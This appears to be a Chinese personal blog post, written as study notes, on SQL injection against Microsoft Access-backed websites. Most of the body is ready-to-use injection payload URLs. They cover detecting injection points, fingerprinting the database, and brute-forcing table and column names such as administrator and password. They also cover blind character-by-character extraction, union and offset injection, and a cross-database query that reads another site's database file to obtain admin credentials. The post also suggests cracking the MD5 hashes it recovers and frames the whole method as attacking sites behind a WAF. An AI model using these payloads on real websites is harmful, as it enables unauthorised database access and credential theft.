
<!DOCTYPE html>
<html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0">
        <title>剣の魔王の小屋</title>
        <meta name="author" content="剣の魔王">
        <meta name="description" content="这个网站没有描述">
        <meta name="keywords" content="">
        <link rel="icon" href="image/head.png">
        <script src="https://cdn.staticfile.org/instant.page/5.1.0/instantpage.min.js" type="module"></script>
        <script src="https://cdn.staticfile.org/font-awesome/6.2.0/js/all.min.js"></script>
        
        <link rel="stylesheet" href="/css/fonts.min.css">
        <link rel="stylesheet" href="/css/particlex.css">
        
        <script src="https://cdn.staticfile.org/vue/3.2.33/vue.global.prod.min.js"></script>
    <meta name="generator" content="Hexo 5.4.2"></head>
    <body>
        <div id="loading" style="height:100vh;width:100vw;position:fixed;display:flex;z-index:2147483647;justify-content:space-between;background:#fff;transition:opacity 0.3s ease-out;-webkit-user-select:none;-moz-user-select:none;user-select:none"><div style="position:fixed;height:100vh;width:100vw;display:flex;justify-content:center;align-items:center"><div id="loadcontent" style="width:50vmin;height:50vmin;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px #a3ddfb;text-align:center"><div><h2>LOADING...</h2><p style="word-break:keep-all">加载过慢请开启缓存(浏览器默认开启)</p><div><img alt="loading" src="/loading.gif"></div></div></div></div></div>
        <div id="layout">
            <i data-fa-symbol="calendar-solid" class="fa-solid fa-calendar fa-fw"></i>
            <i data-fa-symbol="bookmark-solid" class="fa-solid fa-bookmark fa-fw"></i>
            <i data-fa-symbol="tags-solid" class="fa-solid fa-tags fa-fw"></i>
            <transition name="into">
                <div v-show="show_page" style="display: -not-none">
                    <div id="menu_show">
                         
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">剣の魔王の小屋</span>
        </a>
        
        <a href="/">
            <i class="fa-solid fa-house fa-fw"></i>
            <span>&ensp;home</span>
        </a>
        
        <a href="/about">
            <i class="fa-solid fa-id-card fa-fw"></i>
            <span>&ensp;about</span>
        </a>
        
        <a href="/archives">
            <i class="fa-solid fa-box-archive fa-fw"></i>
            <span>&ensp;archives</span>
        </a>
        
        <a href="/categories">
            <i class="fa-solid fa-bookmark fa-fw"></i>
            <span>&ensp;categories</span>
        </a>
        
        <a href="/tags">
            <i class="fa-solid fa-tags fa-fw"></i>
            <span>&ensp;tags</span>
        </a>
        
    </div>
    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div class="curtain" @click="menu_show = !menu_show" v-show="menu_show"></div>
        <div :class="'title'" @click="menu_show = !menu_show">
            <i class="fa-solid fa-bars fa-fw"></i>
            <span>&emsp;剣の魔王の小屋</span>
        </div>
        <transition name="slide">
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-house fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-id-card fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-box-archive fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-bookmark fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width: 20px; max-width: 50px; width: 10%">
                        <i class="fa-solid fa-tags fa-fw"></i>
                    </div>
                    <div style="min-width: 100px; max-width: 150%; width: 20%">tags</div>
                </div>
            </a>
            
        </div>
        </transition>
    </div>
</nav>
                    </div>
                    <div id="main">
                        
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <svg class="fa-icon"><use xlink:href="#calendar-solid"></use></svg>
            </span>
            2024/3/30
        </span>
        
        
    </div>
    <div class="content" v-pre>
        <h1 id="Access注入"><a href="#Access注入" class="headerlink" title="Access注入"></a>Access注入</h1><p>Access、mssql、mongoDB、postgresql、sqlite、oracle、sybase等；<br>数据库架构组成、数据库高权限操作；<br>除了access以外，其他数据库在组成方面都是</p>
<p>access数据库与其他数据库不同，它就只有自己一个数据库，往下没有数据库；<br>access数据库独立存在，每个网站都有自己的accsess数据库，所以没办法使用跨库注入；<br>access也不需要查询数据库名；<br>access很多功能都没有，例如文件读取；</p>
<ul>
<li>access<ul>
<li>表名<ul>
<li>列名<ul>
<li>数据</li>
</ul>
</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><strong><span id="more"></span></strong></p>
<p><strong>提问：什么决定了网站注入点用户权限</strong><br><strong>回答：当前网站的数据库用户，数据库的配置文件是谁连接的</strong></p>
<h4 id="找注入点并确定数据库类型"><a href="#找注入点并确定数据库类型" class="headerlink" title="找注入点并确定数据库类型"></a>找注入点并确定数据库类型</h4><p>找注入点</p>
<pre><code>&#39;          ● 返回错误
and 1=1    ●返回正常
and 1=2    ● 返回错误
# 满足以上条件即存在注入
</code></pre>
<p>判断iis后的数据库类型</p>
<pre><code>and exists (select * from msysobjects)&gt;0 ●返回正常，即可判断其为Access数据库
and exists (select * from sysobjects)&gt;0  ●返回正常，即可判断其为MSSQL数据库
</code></pre>
<h4 id="猜数据库名和字段"><a href="#猜数据库名和字段" class="headerlink" title="猜数据库名和字段"></a>猜数据库名和字段</h4><p>access数据库没有有效办法获取库表名，只能通过暴力破解的方式一个一个的尝试</p>
<p><strong>猜解数据库表名</strong></p>
<p>access数据库没有库名的概念，直接就是表</p>
<pre><code>and exists(select * from 表名) 
# 一个一个猜，猜中为止,例如：
http://XXX?id=1 and exists(select * from users) 
http://XXX?id=1 and exists(select * from admin)
http://XXX?id=1 and exists(select * from administrator)
</code></pre>
<p><strong>猜字段：</strong></p>
<pre><code>and exists(select 字段名 from 表名)
# 一个一个猜，猜中为止 例如：
http://XXX?id=1 and exists(select username from administrator)
http://XXX?id=1 and exists(select user_name from administrator)
http://XXX?id=1 and exists(select password from administrator)
</code></pre>
<h4 id="爆破access中的数据"><a href="#爆破access中的数据" class="headerlink" title="爆破access中的数据"></a>爆破access中的数据</h4><h5 id="猜字段长度和数据（标准）"><a href="#猜字段长度和数据（标准）" class="headerlink" title="猜字段长度和数据（标准）"></a>猜字段长度和数据（标准）</h5><p><strong>猜解字段长度</strong><br>通过上述步骤可以知道，数据库表名是“administrator”,表中字段有“user_name”和“password”。</p>
<pre><code>#用返回的对错猜测
and (select top 1 len(user_name) from administrator)&gt;xx

#如以下报错，可确定字段数目为5
http://xxx?id=14 and (select top 1 len(user_name) from administrator)&gt;3    ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)&gt;4   ●正常
http://xxx?id=14 and (select top 1 len(user_name) from administrator)&gt;5  ●报错
</code></pre>
<p><strong>猜解字段内容</strong></p>
<pre><code>and (select top 1 asc(mid(user_name,1,1)) from administrator)&gt;xx

#先判断第一个字母，是汉字还是字母
## 返回正常页面说明ASCII值大于0 ,是字母
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)&gt;0

# 二分法确定acsii码,
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)&gt;100
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)&gt;50
http://xxx?id=14 and (select top 1 asc(mid(user_name,1,1)) from administrator)&gt;75

# 最后根据确定下来的acsii码97，反查对应表得到第一个字母为a，在用同样的方法确定出来其他位字母
## 密码的话一般会做md5加密，记得用网站的解密工具尝试（简单的可以反解成功）
</code></pre>
<p>小提示: access数据库都是存放在网站目录下，后缀格式为mdb，asp，asa,可以通过一些暴库手段、目录猜解等直接下载数据库，如果是MSSQL、MYSQL等，一般数据库是存储在数据库安装路径下，后缀格式为myi，myd，frm，mdf 不能通过下载得到库。除非走狗屎运，对方管理员把网站库备份在网站目录下。</p>
<h4 id="用联合查询方案注入（通用）"><a href="#用联合查询方案注入（通用）" class="headerlink" title="用联合查询方案注入（通用）"></a>用联合查询方案注入（通用）</h4><p>首先还是要先猜解出所需的表的表名和字段名，这个没有办法<br>再用order by语句排序，根据排序数量，可知当前页面可查询字段数，假设为7<br>再通过union查询数字，确定出页面可显示的字段(假设是第2和3字段)<br>最后通过union语句联合查询指定表(在可显示的字段替换为需要查询的表中的字段)</p>
<pre><code>order by 7
and 1=2 union select 1,2,3,4,5,6,7 from admin
and 1=2 union select 1,user_name,passwoed,4,5,6,7 from admin
</code></pre>
<p><strong>Access注入时，如果列名或表名猜解不到的情况怎么办？</strong></p>
<h4 id="偏移注入和跨库查询"><a href="#偏移注入和跨库查询" class="headerlink" title="偏移注入和跨库查询"></a>偏移注入和跨库查询</h4><h5 id="偏移注入"><a href="#偏移注入" class="headerlink" title="偏移注入"></a>偏移注入</h5><p>偏移注入会随机爆出一个字段内容，具体是什么看运气<br>偏移注入只针对Access数据库，当我们只猜到数据库表名但猜不到列名的情况下，这种方法可以帮我们填补。</p>
<pre><code>#第一步:使用之前的方法得到显示点为2,3，字段个数为7，但是我们并不知道列名
http://XXX?id=14 union select 1,2,3,4,5,6,7 from administrator

#第二步:用*依次向前替换数字字段，直到页面显示正常。例如在5替换为*后页面返回正常
http://XXX?id=14union select  1,2,3,4,* from administrator
#说明星号替换了3个字段(也就是表中有三个字段),后续要使用inner jion自表连接查询，因此计算字段数乘以2是否小于当前列(3*2&lt;7)

#第三步:公式成立的话，用inner jion自连接查询
http://XXX?id=14 union select 1,*  from (administrator as a inner join administrator as b on a.id=b.id)

#如果是更多位，可再接inner join
http://XXX?id=14 union select 1,* from ((administrator as a inner join administrator as b on a.id=b.id) inner join administrator as c a.id=c.id)
</code></pre>
<h5 id="跨库查询"><a href="#跨库查询" class="headerlink" title="跨库查询"></a>跨库查询</h5><p>假设a和b两个站点在同一服务器上面，但a服务器上面安装了安全狗、Waf这样的安全软件，现在我们要对a站点进行攻击，但是没发现什么大漏洞，只找到网站数据库路径，对数据库下载发现下载不了。<br>这个时候我发现b站点有注入点。并且知道了“2和3”是注入点，可以通过跨库的方式，读取指定目录下access数据库的数据。</p>
<pre><code>http://xxx?id=14 union select 1,adminpassword,username,4,5,6,7 from[C:\wwwtest\2AspCMS\AspCms_data\data.asp].Aspcms_Admins
</code></pre>
<p>参考链接：</p>
<p><a target="_blank" rel="noopener" href="https://www.kancloud.cn/noahs/src_hacker/2395002">Access数据库注入 · 白帽与安全 · 看云 (kancloud.cn)</a></p>

    </div>
    
    
</div>
                         
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 20xx - 2024 剣の魔王の小屋
            <span class="footer-icon">
                <i class="fa-solid fa-font-awesome fa-fw"></i>
            </span>
            @剣の魔王
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/argvchs/hexo-theme-particlex">ParticleX Theme</a></div>
        
    </div>
</footer>
                    </div>
                </div>
            </transition>
            <div id="img_show">
                <img id="img_content" alt="img_show">
            </div>
        </div>
        <script src="https://cdn.staticfile.org/highlight.js/11.5.1/highlight.min.js"></script>
        <script src="/js/particlex.js"></script>
        <script src="/js/showimg.js"></script>
        

    </body>
</html>